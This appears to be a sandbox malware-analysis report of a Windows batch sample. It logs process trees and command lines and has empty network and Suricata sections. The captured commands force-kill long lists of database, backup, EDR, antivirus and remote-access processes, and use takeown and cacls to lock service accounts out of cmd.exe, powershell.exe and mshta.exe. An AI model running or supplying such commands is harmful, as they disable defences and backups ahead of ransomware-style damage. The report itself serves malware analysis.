@taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"
7788-
taskkill.exe taskkill /IM ThunderPlatform.exe /F
8500 -
taskkill.exe taskkill /IM iexplore.exe /F
9172 -
taskkill.exe taskkill /IM vm-agent.exe /F
10204 -
taskkill.exe taskkill /IM vm-agent-daemon.exe /F
9400 -
taskkill.exe taskkill /IM eSightService.exe /F
10904 -
taskkill.exe taskkill /IM cygrunsrv.exe /F
1308 -
taskkill.exe taskkill /IM wrapper.exe /F
10932 -
taskkill.exe taskkill /IM nginx.exe /F
11384 -
taskkill.exe taskkill /IM node.exe /F
12984 -
taskkill.exe taskkill /IM sshd.exe /F
12764 -
taskkill.exe taskkill /IM vm-tray.exe /F
13676 -
taskkill.exe taskkill /IM iempwatchdog.exe /F
13620 -
taskkill.exe taskkill /IM sqlwriter.exe /F
14016 -
taskkill.exe taskkill /IM php.exe /F
15348 -
taskkill.exe taskkill /IM "notepad++.exe" /F
14672
-
-
cmd.exe cmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"
8444-
taskkill.exe taskkill /IM pg_ctl.exe /F
9060 -
taskkill.exe taskkill /IM rcrelay.exe /F
9332 -
taskkill.exe taskkill /IM SogouImeBroker.exe /F
2236 -
taskkill.exe taskkill /IM CCenter.exe /F
8492 -
taskkill.exe taskkill /IM ScanFrm.exe /F
10692 -
taskkill.exe taskkill /IM d_manage.exe /F
10652 -
taskkill.exe taskkill /IM RsTray.exe /F
11620 -
taskkill.exe taskkill /IM wampmanager.exe /F
12020 -
taskkill.exe taskkill /IM RavTray.exe /F
13004 -
taskkill.exe taskkill /IM mssearch.exe /F
12544 -
taskkill.exe taskkill /IM sqlmangr.exe /F
13740 -
taskkill.exe taskkill /IM msftesql.exe /F
13884 -
taskkill.exe taskkill /IM SyncBaseSvr.exe /F
13988 -
taskkill.exe taskkill /IM oracle.exe /F
14992 -
taskkill.exe taskkill /IM TNSLSNR.exe /F
2592
-
-
cmd.exe cmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & @taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & @taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill /IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"
8908-
taskkill.exe taskkill /IM BackupExec.exe /F
8764 -
taskkill.exe taskkill /IM Att.exe /F
9312 -
taskkill.exe taskkill /IM mdm.exe /F
9148 -
taskkill.exe taskkill /IM BackupExecManagementService.exe /F
9944 -
taskkill.exe taskkill /IM bengine.exe /F
10688 -
taskkill.exe taskkill /IM benetns.exe /F
10648 -
taskkill.exe taskkill /IM beserver.exe /F
11976 -
taskkill.exe taskkill /IM pvlsvr.exe /F
11712 -
taskkill.exe taskkill /IM bedbg.exe /F
13304 -
taskkill.exe taskkill /IM beremote.exe /F
11336 -
taskkill.exe taskkill /IM beremote.exe /F
13576 -
taskkill.exe taskkill /IM beremote.exe /F
13708 -
taskkill.exe taskkill /IM beremote.exe /F
13504 -
taskkill.exe taskkill /IM RemoteAssistProcess.exe /F
15196 -
taskkill.exe taskkill /IM BarMoniService.exe /F
14472
-
-
cmd.exe cmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM 
K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM 
Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T"
8436-
taskkill.exe taskkill /IM VBoxSDS.exe /F
9152 -
taskkill.exe taskkill /IM mysqld.exe /F
9648 -
taskkill.exe taskkill /IM TeamViewer_Service.exe /F
9800 -
taskkill.exe taskkill /IM TeamViewer.exe /F
10400 -
taskkill.exe taskkill /IM CasLicenceServer.exe /F
11204 -
taskkill.exe taskkill /IM tv_w32.exe /F
12216 -
taskkill.exe taskkill /IM tv_x64.exe /F
7884 -
taskkill.exe taskkill /IM rdm.exe /F
13120 -
taskkill.exe taskkill /IM SecureCRT.exe /F
12468 -
taskkill.exe taskkill /IM SecureCRTPortable.exe /F
13624 -
taskkill.exe taskkill /IM VirtualBox.exe /F
13796 -
taskkill.exe taskkill /IM VBoxSVC.exe /F
14008 -
taskkill.exe taskkill /IM VirtualBoxVM.exe /F
15232 -
taskkill.exe taskkill /IM abs_deployer.exe /F
15052
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
section | .code |
file | C:\Users\test22\AppData\Local\Temp\63A4.tmp\63A5.tmp\63A6.bat |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service" |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE |
cmdline | cacls C:\Windows\system32\cmd.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver |
cmdline | cmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM 
notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F" |
cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress |
cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE |
cmdline | cacls C:\Windows\system32\cmd.exe /e /d SERVICE |
cmdline | takeown /f C:\Windows\SysWOW64\cmd.exe /a |
cmdline | takeown /f C:\Windows\SysWOW64\mshta.exe /a |
cmdline | cacls C:\Windows\system32\cmd.exe /e /d "network service" |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r |
cmdline | cacls C:\Windows\system32\mshta.exe /e /d "network service" |
cmdline | cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress |
cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /d system |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f |
cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r |
cmdline | cacls C:\Windows\system32\mshta.exe /e /g Administrators:r |
